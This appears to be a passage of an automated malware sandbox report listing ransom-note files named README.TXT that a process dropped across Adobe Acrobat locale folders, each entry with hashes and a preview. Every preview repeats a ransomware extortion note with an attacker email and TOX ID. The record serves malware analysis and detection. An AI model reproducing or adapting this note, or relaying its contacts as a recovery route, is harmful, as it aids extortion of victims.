                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
